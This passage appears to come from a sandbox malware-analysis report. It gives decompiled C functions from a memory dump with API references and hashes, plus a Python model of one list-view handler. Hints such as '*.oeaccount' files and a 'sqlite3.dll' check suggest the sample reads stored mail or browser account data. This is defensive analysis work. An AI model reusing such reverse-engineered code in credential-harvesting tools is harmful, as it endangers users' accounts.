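NMLISTVIEW_FIELDS = ("hwndFrom", "idFrom", "code", "iItem", "iSubItem",
                     "uNewState", "uOldState", "uChanged", "ptx", "pty", "lParam")


def parse_nmlistview(buf: bytes) -> dict:
    return dict(zip(NMLISTVIEW_FIELDS, struct.unpack_from(NMLISTVIEW_FMT, buf)))


def make_nmlistview(code: int, new_state: int, old_state: int) -> bytes:
    """Constructed notification for testing; hwndFrom/idFrom are placeholder values."""
    return struct.pack(NMLISTVIEW_FMT, 0x000A0B0C, 0x103, code, 0, 0,
                       new_state, old_state, 0x8, 0, 0, 0)


def selection_changed_branchy(new_state: int, old_state: int) -> int:
    """Transcription of the L20/L22/L23 branch ladder (taken when the field at +0x1b8 is 0)."""
    new_sel = new_state & LVIS_SELECTED      # _t45 in the listing
    old_sel = old_state & LVIS_SELECTED
    if new_sel == 0:
        return 1 if old_sel else 0           # item was deselected
    return 0 if old_sel else 1               # item became selected


def selection_changed_masked(new_state: int, old_state: int) -> int:
    """The neg/sbb/neg form (field at +0x1b8 non-zero): ((old ^ new) & 0xF002) != 0."""
    mask = LVIS_SELECTED | LVIS_STATEIMAGEMASK   # 0xF002
    return int(((old_state ^ new_state) & mask) != 0)


def branch_forms_agree() -> bool:
    """Both forms agree whenever only the LVIS_SELECTED bit can change."""
    states = (0, LVIS_SELECTED)
    return all(selection_changed_branchy(n, o) == selection_changed_masked(n, o)
               for n in states for o in states)


def handle_lvn_itemchanged(buf: bytes, track_state_image: bool, refresh_pending: bool):
    """Mirror the LVN_ITEMCHANGED path. Returns (post_wm_user_2, refresh_pending_after).
    track_state_image stands in for *(*(_t63+0x370)+0x1b8) and refresh_pending for
    *(_t63+0x25c); both names are assumptions about fields the listing only reads."""
    nm = parse_nmlistview(buf)
    if resolve_notify_code(nm["code"]) != "LVN_ITEMCHANGED":
        return (False, refresh_pending)
    if track_state_image:
        changed = selection_changed_masked(nm["uNewState"], nm["uOldState"])
    else:
        changed = selection_changed_branchy(nm["uNewState"], nm["uOldState"])
    if not changed or refresh_pending:
        return (False, refresh_pending)
    # original: *(_t63 + 0x25c) = 1; PostMessageA(hwnd, WM_USER + 2, 0, 0)
    return (True, True)


if __name__ == "__main__":
    print(annotate_listing())
    print(handle_lvn_itemchanged(make_nmlistview(LVN_FIRST - 1, LVIS_SELECTED, 0), False, False))
```

The practical point for reading this listing: the ladder and the mask differ only in whether state-image (checkbox) changes count, so the field at +0x1b8 selects which kind of list-view change triggers the WM_USER+2 post, and the flag at +0x25c stops repeated posts until the earlier one is consumed.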

C-Code - Quality: 94%
			E0040A283(void* __eax, void* __eflags, char* _a4, intOrPtr _a8) {
				intOrPtr _v8;
				signed int _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				void* __ebx;
				signed int _t63;
				intOrPtr _t67;
				intOrPtr _t72;
				intOrPtr _t74;
				signed int _t79;
				void* _t84;
				signed int _t86;
				char* _t98;
				void* _t100;
				void* _t102;
				void* _t104;
				void* _t106;
				void* _t107;

				_t84 = __eax;
				E00408A97(__eax, __eflags);
				_t86 = 0;
				_v12 = 0;
				while(1) {
					_t98 = _a4;
					if( *((intOrPtr*)(_t86 + _t98)) - 0x30 > 9) {
						break;
					}
					_t86 = _t86 + 1;
					if(_t86 < 1) {
						continue;
					}
					if(strlen(_t98) >= 3) {
						break;
					}
					_t79 = atoi(_a4);
					if(_t79 >= 0 && _t79 <  *((intOrPtr*)(_t84 + 0x20))) {
						_v12 =  *((intOrPtr*)( *( *((intOrPtr*)(_t84 + 0x24)) + _t79 * 4) * 0x14 +  *((intOrPtr*)(_t84 + 0x1b4))));
					}
					L21:
					if(_a8 != 0) {
						_v12 = _v12 | 0x00001000;
					}
					_t63 = _v12;
					 *0x41848c =  *0x41848c + 1;
					 *((intOrPtr*)(0x418490 +  *0x41848c * 4)) = _t63;
					return _t63;
				}
				_t104 = 0;
				__eflags =  *((intOrPtr*)(_t84 + 0x1b0));
				_v16 = 0;
				_v8 = 0;
				if( *((intOrPtr*)(_t84 + 0x1b0)) <= 0) {
					L14:
					_t100 = 0;
					__eflags =  *((intOrPtr*)(_t84 + 0x1b0));
					_v8 = 0;
					if( *((intOrPtr*)(_t84 + 0x1b0)) <= 0) {
						L20:
						goto L21;
					}
					_t106 = 0;
					__eflags = 0;
					do {
						_v20 = E00406A01(0, _a4);
						_t67 = E00406A01(0, _a4);
						__eflags = _v20;
						if(_v20 >= 0) {
							L18:
							_v12 =  *((intOrPtr*)(_t106 +  *((intOrPtr*)(_t84 + 0x1b4))));
							goto L19;
						}
						__eflags = _t67;
						if(_t67 < 0) {
							goto L19;
						}
						goto L18;
						L19:
						_v8 = _v8 + 1;
						_t100 = _t100 + 0x10;
						_t106 = _t106 + 0x14;
						__eflags = _v8 -  *((intOrPtr*)(_t84 + 0x1b0));
					} while (_v8 <  *((intOrPtr*)(_t84 + 0x1b0)));
					goto L20;
				}
				_t102 = 0;
				__eflags = 0;
				do {
					_t72 =  *((intOrPtr*)( *((intOrPtr*)(_t84 + 0x1b4)) + _t104 + 0x10));
					_push(_a4);
					_push(_t72);
					L0041207E();
					_push(_a4);
					_v20 = _t72;
					_t74 =  *((intOrPtr*)( *((intOrPtr*)(_t84 + 0x34)) + _t102 + 0xc));
					_push(_t74);
					L0041207E();
					_t107 = _t107 + 0x10;
					__eflags = _v20;
					if(_v20 == 0) {
						L11:
						_v12 =  *(_t104 +  *((intOrPtr*)(_t84 + 0x1b4)));
						_v16 = 1;
						goto L12;
					}
					__eflags = _t74;
					if(_t74 != 0) {
						goto L12;
					}
					goto L11;
					L12:
					_v8 = _v8 + 1;
					_t102 = _t102 + 0x10;
					_t104 = _t104 + 0x14;
					__eflags = _v8 -  *((intOrPtr*)(_t84 + 0x1b0));
				} while (_v8 <  *((intOrPtr*)(_t84 + 0x1b0)));
				__eflags = _v16;
				if(_v16 != 0) {
					goto L20;
				}
				goto L14;
			}

                                                                                                                                                                  0x0040a31d
                                                                                                                                                                  0x0040a322
                                                                                                                                                                  0x0040a325
                                                                                                                                                                  0x0040a329
                                                                                                                                                                  0x0040a32f
                                                                                                                                                                  0x0040a338
                                                                                                                                                                  0x0040a33b
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x0040a33b
                                                                                                                                                                  0x0040a32b
                                                                                                                                                                  0x0040a32d
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x0040a342
                                                                                                                                                                  0x0040a342
                                                                                                                                                                  0x0040a348
                                                                                                                                                                  0x0040a34b
                                                                                                                                                                  0x0040a34e
                                                                                                                                                                  0x0040a34e
                                                                                                                                                                  0x0040a356
                                                                                                                                                                  0x0040a35a
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00000000

APIs
• Part of subcall function 00408A97: ??2@YAPAXI@Z.MSVCRT ref: 00408AB8
• Part of subcall function 00408A97: ??3@YAXPAX@Z.MSVCRT ref: 00408B7F
• strlen.MSVCRT ref: 0040A2A9
• atoi.MSVCRT ref: 0040A2B7
• _mbsicmp.MSVCRT ref: 0040A30A
• _mbsicmp.MSVCRT ref: 0040A31D
Memory Dump Source
• Source File: 00000018.00000002.423819557.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000018.00000002.423853684.0000000000419000.00000040.00000001.sdmp
Yara matches
Similarity
• API ID: _mbsicmp$??2@??3@atoistrlen
• String ID:
• API String ID: 4107816708-0
• Opcode ID: fcbe6108af864edb97e3be4016439bdb3d8805d59c5b364e212079bc31d54683
• Instruction ID: a4071902e71568577f89ec7532499d814672e4af5b69a40392892895b6c6556c
• Opcode Fuzzy Hash: fcbe6108af864edb97e3be4016439bdb3d8805d59c5b364e212079bc31d54683
• Instruction Fuzzy Hash: 2F414C35900304ABCB11DFA9C580A9ABBF4FB48308F1085BEEC45EB382D775DA51CB59
Uniqueness
Uniqueness Score: -1.00%

C-Code - Quality: 100%
E00411533(char* __eax, void* __edi) {
	unsigned int _v5;
	signed int _v6;
	signed int _v7;
	intOrPtr _v12;
	intOrPtr _v16;
	intOrPtr _t37;
	char* _t56;
	signed char _t57;
	char* _t67;
	void* _t68;
	void* _t69;

	_t68 = __edi;
	_t56 = __eax;
	_t69 = 0;
	_t37 = strlen(__eax) + 0xfffffffd;
	_v16 = _t37;
	if(_t37 < 0) {
		L18:
		 *((char*)(_t69 + _t68)) = 0;
		return _t69;
	}
	_v12 = 0xfffffffe;
	_v12 = _v12 - _t56;
	_t5 = _t56 + 2; // 0x4116ad
	_t67 = _t5;
	while(1) {
		_t6 = _t67 - 2; // 0x75fff88b
		_t39 =  *_t6;
		if( *_t6 != 0x2e) {
			_v6 = E004114FF(_t39);
		} else {
			_v6 = 0x3e;
		}
		_t9 = _t67 - 1; // 0xfc75fff8
		_t41 =  *_t9;
		if( *_t9 != 0x2e) {
			_v5 = E004114FF(_t41);
		} else {
			_v5 = 0x3e;
		}
		_t43 =  *_t67;
		if( *_t67 != 0x2e) {
			_t57 = E004114FF(_t43);
		} else {
			_t57 = 0x3e;
		}
		_t45 =  *((intOrPtr*)(_t67 + 1));
		if( *((intOrPtr*)(_t67 + 1)) != 0x2e) {
			_v7 = E004114FF(_t45);
		} else {
			_v7 = 0x3e;
		}
		 *(_t68 + _t69) = _v5 >> 0x00000004 | _v6 << 0x00000002;
		if( *_t67 == 0x2d) {
			break;
		}
		 *(_t69 + _t68 + 1) = _t57 >> 0x00000002 | _v5 << 0x00000004;
		if( *((char*)(_t67 + 1)) == 0x2d) {
			 *((char*)(_t69 + _t68 + 2)) = 0;
			_t34 = _t69 + 2; // 0x2
			return _t34;
		}
		_t69 = _t69 + 3;
		 *(_t69 + _t68 - 1) = _t57 << 0x00000006 | _v7;
		_t25 = _t69 + 5; // 0x2
		_t67 = _t67 + 4;
		if(_t25 >= 0x3ff || _v12 + _t67 > _v16) {
			goto L18;
		} else {
			continue;
		}
	}
	 *(_t69 + _t68 + 1) = 0;
	_t31 = _t69 + 1; // 0x1
	return _t31;
}
                                                                                                                                                                  0x004115e2
                                                                                                                                                                  0x004115e5
                                                                                                                                                                  0x004115e9
                                                                                                                                                                  0x004115ec
                                                                                                                                                                  0x004115f4
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x004115f4
                                                                                                                                                                  0x0041160e
                                                                                                                                                                  0x00411613
                                                                                                                                                                  0x00000000

APIs
Strings
Memory Dump Source
• Source File: 00000018.00000002.423819557.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000018.00000002.423853684.0000000000419000.00000040.00000001.sdmp
Yara matches
Similarity
• API ID: strlen
• String ID: >$>$>
• API String ID: 39653677-3911187716
• Opcode ID: 7edb754ddf4429fd3ce2b30709e1edacb08f523e3e7d14c7b467b5b93d7c181c
• Instruction ID: 10e230c6dca09e0a93cf8d60ed085072b0d540c64d6ff1ff1f1df815401d523a
• Opcode Fuzzy Hash: 7edb754ddf4429fd3ce2b30709e1edacb08f523e3e7d14c7b467b5b93d7c181c
• Instruction Fuzzy Hash: 6331E4718492C5AFCB118B6C80417EEFFA24F62304F08869AC2D546353C26DA5CAC39A
Uniqueness

Uniqueness Score: -1.00%

C-Code - Quality: 50%
E0040BE4E(signed int __eax, void* __ecx, void* _a4) {
	unsigned int _t23;
	signed int _t25;
	unsigned int _t34;
	unsigned int _t36;
	void* _t40;
	unsigned int _t45;
	void* _t46;
	int _t47;
	void* _t48;
	void* _t50;

	_t48 = __ecx;
	_t34 = __eax;
	_t23 =  *(__ecx + 0x10);
	_t36 = _t23 + __eax * 8;
	 *(__ecx + 0x10) = _t36;
	if(_t36 < _t23) {
		 *((intOrPtr*)(__ecx + 0x14)) =  *((intOrPtr*)(__ecx + 0x14)) + 1;
	}
	 *((intOrPtr*)(_t48 + 0x14)) =  *((intOrPtr*)(_t48 + 0x14)) + (_t34 >> 0x1d);
	_t25 = _t23 >> 0x00000003 & 0x0000003f;
	if(_t25 == 0) {
		L6:
		if(_t34 >= 0x40) {
			_t45 = _t34 >> 6;
			do {
				memcpy(_t48 + 0x18, _a4, 0x40);
				_t50 = _t50 + 0xc;
				E0040BF6B(_t48 + 0x18, _t48);
				_a4 = _a4 + 0x40;
				_t34 = _t34 - 0x40;
				_t45 = _t45 - 1;
			} while (_t45 != 0);
		}
		_push(_t34);
		_push(_a4);
		_push(_t48 + 0x18);
	} else {
		_t46 = 0x40;
		_t47 = _t46 - _t25;
		_t40 = _t48 + 0x18 + _t25;
		if(_t34 >= _t47) {
			memcpy(_t40, _a4, _t47);
			_t50 = _t50 + 0xc;
			E0040BF6B(_t48 + 0x18, _t48);
			_a4 = _a4 + _t47;
			_t34 = _t34 - _t47;
			goto L6;
		} else {
			_push(_t34);
			_push(_a4);
			_push(_t40);
		}
	}
	return memcpy();
}

Instruction addresses (disassembly listing; the instruction text did not survive extraction):
0x0040be53 0x0040be55 0x0040be57 0x0040be5a 0x0040be60 0x0040be63 0x0040be65 0x0040be65 0x0040be6d 0x0040be73 0x0040be76 0x0040bea8 0x0040beab 0x0040beaf 0x0040beb2 0x0040bebb 0x0040bec0 0x0040bec8 0x0040becd 0x0040bed1 0x0040bed4 0x0040bed4 0x0040beb2 0x0040bed7 0x0040bed8 0x0040bede 0x0040be78 0x0040be7a 0x0040be7b 0x0040be7f 0x0040be83 0x0040be91 0x0040be96 0x0040be9e 0x0040bea3 0x0040bea6 0x00000000 0x0040be85 0x0040be85 0x0040be86 0x0040be89 0x0040be89 0x0040be83 0x0040beeb

APIs
Strings
Memory Dump Source
• Source File: 00000018.00000002.423819557.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000018.00000002.423853684.0000000000419000.00000040.00000001.sdmp
Yara matches
Similarity
• API ID: memcpy
• String ID: @
• API String ID: 3510742995-2766056989
• Opcode ID: 49a5a345e8207f48ba7b20f9c3d546e09529423d2927eee968959314de42fdf5
• Instruction ID: eb902c52722b89a171555a0eccdb346c2cc9b7794a0320b873d5afd3574b0f46
• Opcode Fuzzy Hash: 49a5a345e8207f48ba7b20f9c3d546e09529423d2927eee968959314de42fdf5
• Instruction Fuzzy Hash: 201138B29007096BCB288E25C8809EB77A9EF54344700063FFE0696691E7759E95C7DC
Uniqueness

Uniqueness Score: -1.00%

C-Code - Quality: 100%
E0040B84C(void* __ecx, void* _a4) {
	struct _WNDCLASSA _v44;
	void _v299;
	char _v300;
	void _v555;
	char _v556;
	void* __edi;
	void* __esi;
	struct HINSTANCE__* _t27;
	CHAR* _t32;
	struct HWND__* _t34;
	void* _t36;
	void* _t41;

	_t36 = __ecx;
	_v556 = 0;
	memset( &_v555, 0, 0xff);
	_v300 = 0;
	memset( &_v299, 0, 0xff);
	_t27 =  *0x417b94; // 0x400000
	_t41 = _a4;
	_v44.hInstance = _t27;
	_v44.hIcon =  *((intOrPtr*)(_t41 + 0x104));
	_v44.lpszClassName = _t41 + 4;
	_v44.style = 0;
                                                                                                                                                                  				_v44.lpfnWndProc = E0040174E;
                                                                                                                                                                  				_v44.cbClsExtra = 0;
                                                                                                                                                                  				_v44.cbWndExtra = 0;
                                                                                                                                                                  				_v44.hCursor = 0;
                                                                                                                                                                  				_v44.hbrBackground = 0x10;
                                                                                                                                                                  				_v44.lpszMenuName = 0;
                                                                                                                                                                  				RegisterClassA( &_v44);
                                                                                                                                                                  				_t32 = E004019DA(_t36,  &_v300, 0x413450);
                                                                                                                                                                  				_t34 = CreateWindowExA(0, E004019DA(_t36,  &_v556, 0x414478), _t32, 0xcf0000, 0, 0, 0x280, 0x1e0, 0, 0,  *0x417b94, _t41);
                                                                                                                                                                  				 *(_a4 + 0x108) = _t34;
                                                                                                                                                                  				return _t34;
                                                                                                                                                                  			}















                                                                                                                                                                  0x0040b84c
                                                                                                                                                                  0x0040b868
                                                                                                                                                                  0x0040b86e
                                                                                                                                                                  0x0040b87c
                                                                                                                                                                  0x0040b882
                                                                                                                                                                  0x0040b887
                                                                                                                                                                  0x0040b88c
                                                                                                                                                                  0x0040b88f
                                                                                                                                                                  0x0040b898
                                                                                                                                                                  0x0040b89e
                                                                                                                                                                  0x0040b8a8
                                                                                                                                                                  0x0040b8ab
                                                                                                                                                                  0x0040b8b2
                                                                                                                                                                  0x0040b8b5
                                                                                                                                                                  0x0040b8b8
                                                                                                                                                                  0x0040b8bb
                                                                                                                                                                  0x0040b8c2
                                                                                                                                                                  0x0040b8c5
                                                                                                                                                                  0x0040b8f0
                                                                                                                                                                  0x0040b908
                                                                                                                                                                  0x0040b913
                                                                                                                                                                  0x0040b91b

APIs
Memory Dump Source
• Source File: 00000018.00000002.423819557.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000018.00000002.423853684.0000000000419000.00000040.00000001.sdmp
Yara matches
Similarity
• API ID: memset$ClassCreateRegisterWindowstrncat
• String ID:
• API String ID: 3664037073-0
• Opcode ID: be5346cb48c8cedca28fb9c953b908c4a3ca165af802d2e293ff076a17b9cc61
• Instruction ID: a433a9f07fbe34a5cd63bc5fe357f5218a2175739f92369553503b68093de8d1
• Opcode Fuzzy Hash: be5346cb48c8cedca28fb9c953b908c4a3ca165af802d2e293ff076a17b9cc61
• Instruction Fuzzy Hash: F1211FB5C01218AFDB50DF95DD85ADFBBBCEB08354F0040BAE549B3251C778AE848BA4
Uniqueness

Uniqueness Score: -1.00%

C-Code - Quality: 93%
E004070D9(void** __esi, intOrPtr _a4, intOrPtr _a8) {
    signed int _t21;
    signed int _t23;
    void* _t24;
    signed int _t31;
    void* _t33;
    void* _t44;
    signed int _t46;
    void* _t48;
    signed int _t51;
    int _t52;
    void** _t53;
    void* _t58;

    _t53 = __esi;
    _t1 =  &(_t53[1]); // 0x0
    _t51 =  *_t1; // number of 8-byte entries in the table pointed to by _t53[0]
    _t21 = 0;
    if(_t51 <= 0) {
        L4:
        _t2 =  &(_t53[2]); // 0x8
        _t33 =  *_t53;
        _t23 =  *_t2 + _t51; // new capacity = old capacity + growth step (_t53[2])
        _t46 = 8;
        _t53[1] = _t23;
        _t24 = _t23 * _t46;
        _push( ~(0 | _t58 > 0x00000000) | _t24); // byte size; looks like MSVC's new[] overflow guard, which saturates the size when count*8 overflows
        L00412090(); // operator new (??2@YAPAXI@Z)
        _t10 =  &(_t53[1]); // 0x0
         *_t53 = _t24;
        memset(_t24, 0,  *_t10 << 3);
        _t52 = _t51 << 3;
        memcpy( *_t53, _t33, _t52); // copy the old entries into the grown block
        if(_t33 != 0) {
            _push(_t33);
            L00412096(); // operator delete (??3@YAXPAX@Z)
        }
         *((intOrPtr*)( *_t53 + _t52)) = _a4; // the new entry takes the first slot past the old capacity
         *((intOrPtr*)(_t52 +  *_t53 + 4)) = _a8;
    } else {
        _t44 =  *__esi;
        _t48 = _t44;
        while( *_t48 != 0) { // look for the first entry whose first dword is zero (a free slot)
            _t21 = _t21 + 1;
            _t48 = _t48 + 8;
            _t58 = _t21 - _t51;
            if(_t58 < 0) {
                continue;
            } else {
                goto L4; // table full: grow it
            }
            goto L7;
        }
        _t31 = _t21 << 3;
         *((intOrPtr*)(_t44 + _t31)) = _a4; // reuse the free slot in place
         *((intOrPtr*)(_t31 +  *_t53 + 4)) = _a8;
    }
    L7:
    return 1;
}

Instruction addresses, one per statement line above (0x00000000 marks lines synthesized by the decompiler): 0x004070d9, 0x004070da, 0x004070da, 0x004070dd, 0x004070e1, 0x004070f4, 0x004070f4, 0x004070f8, 0x004070fa, 0x00407100, 0x00407101, 0x00407104, 0x0040710d, 0x0040710e, 0x00407113, 0x0040711d, 0x0040711f, 0x00407124, 0x0040712b, 0x00407135, 0x00407137, 0x00407138, 0x0040713d, 0x00407144, 0x0040714d, 0x004070e3, 0x004070e3, 0x004070e5, 0x004070e7, 0x004070ec, 0x004070ed, 0x004070f0, 0x004070f2, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x004070f2, 0x0040715d, 0x00407160, 0x00407169, 0x00407169, 0x00407152, 0x00407156

APIs
Memory Dump Source
• Source File: 00000018.00000002.423819557.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000018.00000002.423853684.0000000000419000.00000040.00000001.sdmp
Yara matches
Similarity
• API ID: ??2@??3@memcpymemset
• String ID:
• API String ID: 1865533344-0
• Opcode ID: e4c1b742036f6387abe750b9dffb2ef64d195688e0a077fc4da9177e63e0e53c
• Instruction ID: 17b98b22fb48c4f462205fa6a58e9a56533f9d3233289d57114c66ebe089a08a
• Opcode Fuzzy Hash: e4c1b742036f6387abe750b9dffb2ef64d195688e0a077fc4da9177e63e0e53c
• Instruction Fuzzy Hash: A6113D716046019FD328DF2DC981A27F7E6FF98304B20892EE59AC7385DA75E841CB55
Uniqueness

Uniqueness Score: -1.00%

C-Code - Quality: 37%
    E0040F61F(char* __esi, char _a4, intOrPtr _a8) {
        void* _v8;
        char* _v16;
        intOrPtr _v20;
        intOrPtr _v24;
        intOrPtr _v28;
        intOrPtr _v32;
        intOrPtr _v36;
        char _v40;
        char _v304;
        char* _t18;
        char* _t22;
        char* _t23;
        intOrPtr* _t24;
        intOrPtr* _t26;
        intOrPtr _t30;
        void* _t35;
        char* _t36;

        /* Obtain the shell allocator (IMalloc*) in _v8; it is used below to free the PIDL. */
        _t18 = &_v8;
        _t30 = 0;
        __imp__SHGetMalloc(_t18);
        if(_t18 >= 0) {
            /* Fill a BROWSEINFOA structure at _v40: owner window, title, flags (4), callback E0040F5A7, lParam. */
            _v40 = _a4;
            _v28 = _a8;
            _t22 = &_v40;
            _v36 = 0;
            _v32 = 0;
            _v24 = 4;
            _v20 = E0040F5A7;
            _v16 = __esi;
            /* Show the folder-picker dialog; returns a PIDL or NULL on cancel. */
            __imp__SHBrowseForFolderA(_t22, _t35);
            _t36 = _t22;
            if(_t36 != 0) {
                /* Resolve the PIDL to a path in the 300-byte local _v304 and copy it to the caller's buffer (no length check). */
                _t23 = &_v304;
                __imp__SHGetPathFromIDListA(_t36, _t23);
                if(_t23 != 0) {
                    _t30 = 1;
                    strcpy(__esi, &_v304);
                }
                /* IMalloc::Free(pidl) (vtable slot 0x14) followed by IMalloc::Release() (slot 8). */
                _t24 = _v8;
                *((intOrPtr*)(*_t24 + 0x14))(_t24, _t36);
                _t26 = _v8;
                *((intOrPtr*)(*_t26 + 8))(_t26);
            }
        }
        return _t30;
    }


APIs
• SHGetMalloc.SHELL32(?), ref: 0040F62F
• SHBrowseForFolderA.SHELL32(?), ref: 0040F661
• SHGetPathFromIDListA.SHELL32(00000000,?), ref: 0040F675
• strcpy.MSVCRT(?,?), ref: 0040F688
Memory Dump Source
• Source File: 00000018.00000002.423819557.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000018.00000002.423853684.0000000000419000.00000040.00000001.sdmp
Yara matches
Similarity
• API ID: BrowseFolderFromListMallocPathstrcpy
• String ID:
• API String ID: 409945605-0
• Opcode ID: 46f915da22a8394e3ccfb75a6a67a5d073b6093023bbcacd313ffdd2da9d0fc7
• Instruction ID: b2d480601b656eadb7f9024a04999e6b50b11c93cc119ce3783244db306e4add
• Opcode Fuzzy Hash: 46f915da22a8394e3ccfb75a6a67a5d073b6093023bbcacd313ffdd2da9d0fc7
• Instruction Fuzzy Hash: 5811F7B5900208AFCB10DFA9D9889EEBBF8FB49315F10447AE905E7250D739DA46CF64
Uniqueness

Uniqueness Score: -1.00%

C-Code - Quality: 82%
    E00411C05(void* __edi, void* __esi, void* __eflags, intOrPtr _a4, void* _a8) {
        void* _t10;
        void* _t13;
        char* _t15;
        void* _t21;
        void* _t24;
        long _t27;

        /* E00405ED5 opens the file named by _a8 (CreateFileA, see APIs); INVALID_HANDLE_VALUE means failure. */
        _t10 = E00405ED5(_a8);
        _pop(_t21);
        _a8 = _t10;
        if(_t10 == 0xffffffff) {
            return 0;
        }
        /* Allocate file size + 5 bytes with operator new (L00412090 = ??2@YAPAXI@Z). */
        _t27 = GetFileSize(_t10, 0);
        _t3 = _t27 + 5; // 0x5
        _t13 = _t3;
        _push(_t13);
        L00412090();
        _t24 = _t13;
        /* E00406725 reads the whole file into the buffer (ReadFile, see APIs). */
        E00406725(_t21, _a8, _t24, _t27);
        /* Terminate with three zero bytes so the content can be parsed as ANSI or UTF-16 text. */
        _t15 = _t24 + _t27;
        *_t15 = 0;
        *((char*)(_t15 + 1)) = 0;
        *((char*)(_t15 + 2)) = 0;
        /* Hand the file content to E00411C76 for parsing, then close and free (L00412096 = ??3@YAXPAX@Z). */
        E00411C76(_a4, _t24);
        CloseHandle(_a8);
        if(_t24 != 0) {
            _push(_t24);
            L00412096();
        }
        return 1;
    }


APIs
  • Part of subcall function 00405ED5: CreateFileA.KERNEL32(0041133F,80000000,00000001,00000000,00000003,00000000,00000000,0041127B,0041141B,?,0041133F,?,?,*.oeaccount,0041141B,?), ref: 00405EE7
• GetFileSize.KERNEL32(00000000,00000000,?,?,?,0040D064,00000000,0040D972,?,?,00000104,00000000,?,0040D972,?,00000000), ref: 00411C1E
• ??2@YAPAXI@Z.MSVCRT ref: 00411C2A
  • Part of subcall function 00406725: ReadFile.KERNEL32(?,0041141B,?,00000000,00000000,?,?,004112BE,0041141B,00000000,-00000002,?,0041133F,?,?,*.oeaccount), ref: 0040673C
• CloseHandle.KERNEL32(0040D972,00000000,?,0040D972,?,00000000,?,?,?,?,?,?), ref: 00411C58
• ??3@YAXPAX@Z.MSVCRT ref: 00411C63
Memory Dump Source
• Source File: 00000018.00000002.423819557.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000018.00000002.423853684.0000000000419000.00000040.00000001.sdmp
Yara matches
Similarity
• API ID: File$??2@??3@CloseCreateHandleReadSize
• String ID:
• API String ID: 1968906679-0
• Opcode ID: 33877706b5d6ce5a60bd243af652b3227341b80957e1355f9b7c322417ce527a
• Instruction ID: 7eee50cd159b1862f9f77aaf36d5f43b0d65e01e2e9cd2c6863135ac6fea6ec1
• Opcode Fuzzy Hash: 33877706b5d6ce5a60bd243af652b3227341b80957e1355f9b7c322417ce527a
• Instruction Fuzzy Hash: 7801A231004104AAD711AF35DC09FDB3FA99F46374F15C12AF5188B2A1EB7A8650C7A9
Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  C-Code - Quality: 80%
			E0040A5A1(void* __esi) {
				void* _v260;
				char _v516;
				void* __ebx;
				char* _t16;
				signed short _t25;
				signed short _t27;
				void* _t28;

				_t28 = __esi;
				_push(E004087B1( *((intOrPtr*)(__esi + 0x370))));
				_t25 = 4;
				sprintf( &_v260, E00407A69(_t25));
				_t16 = E00408D4B( *((intOrPtr*)(__esi + 0x370)), 0);
				if(_t16 > 0) {
					_push(_t16);
					_t27 = 5;
					sprintf( &_v516, E00407A69(_t27));
					_t16 = strcat( &_v260,  &_v516);
				}
				if( *((intOrPtr*)(_t28 + 0x108)) != 0) {
					return SendMessageA( *(_t28 + 0x114), 0x401, 0,  &_v260);
				}
				return _t16;
			}

Instruction addresses: 0x0040a5a1, 0x0040a5b6, 0x0040a5b9, 0x0040a5c7, 0x0040a5d7, 0x0040a5de, 0x0040a5e0, 0x0040a5e3, 0x0040a5f1, 0x0040a604, 0x0040a609, 0x0040a614, 0x00000000, 0x0040a62a, 0x0040a631

APIs
  • Part of subcall function 00407A69: LoadStringA.USER32 ref: 00407B32
  • Part of subcall function 00407A69: memcpy.MSVCRT ref: 00407B71
• sprintf.MSVCRT ref: 0040A5C7
• SendMessageA.USER32 ref: 0040A62A
  • Part of subcall function 00407A69: strcpy.MSVCRT(004182C0,strings,?,?,0040898C,?,?,?,?,?,00000000,76D24DE0), ref: 00407AE4
  • Part of subcall function 00407A69: strlen.MSVCRT ref: 00407B02
• sprintf.MSVCRT ref: 0040A5F1
• strcat.MSVCRT(?,?,?,00000000,00000000), ref: 0040A604
Memory Dump Source
• Source File: 00000018.00000002.423819557.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000018.00000002.423853684.0000000000419000.00000040.00000001.sdmp
Yara matches
Similarity
• API ID: sprintf$LoadMessageSendStringmemcpystrcatstrcpystrlen
• String ID:
• API String ID: 919693953-0
• Opcode ID: 958ab865ac69a3c4c3d9128656c309624dbea8e97793038db77fe03c7bb4008b
• Instruction ID: 49acf1ec04927684f0e14b468f671fa247d4e43980f6f5764d7eadf86f6a0ac4
• Opcode Fuzzy Hash: 958ab865ac69a3c4c3d9128656c309624dbea8e97793038db77fe03c7bb4008b
• Instruction Fuzzy Hash: 8A01DBB190030467D720F7B4CD86FDB73ACAB04304F04046FB755F61C2DAB9E6948A69
Uniqueness

Uniqueness Score: -1.00%

C-Code - Quality: 87%
			E0040FA2B(char* _a4) {
				void _v267;
				char _v268;
				int _t12;
				signed int _t16;

				_v268 = 0;
				memset( &_v267, 0, 0x104);
				_t12 = strlen(_a4);
				_t5 = strlen("sqlite3.dll") + 1; // 0x1
				if(_t12 + _t5 >= 0x104) {
					_v268 = 0;
				} else {
					E004062B7( &_v268, _a4, "sqlite3.dll");
				}
				_t16 = E00406155( &_v268);
				asm("sbb eax, eax");
				return  ~( ~_t16);
			}

Instruction addresses: 0x0040fa46, 0x0040fa4d, 0x0040fa55, 0x0040fa67, 0x0040fa70, 0x0040fa85, 0x0040fa72, 0x0040fa7c, 0x0040fa82, 0x0040fa93, 0x0040fa9c, 0x0040faa3

APIs
• memset.MSVCRT ref: 0040FA4D
• strlen.MSVCRT ref: 0040FA55
• strlen.MSVCRT ref: 0040FA62
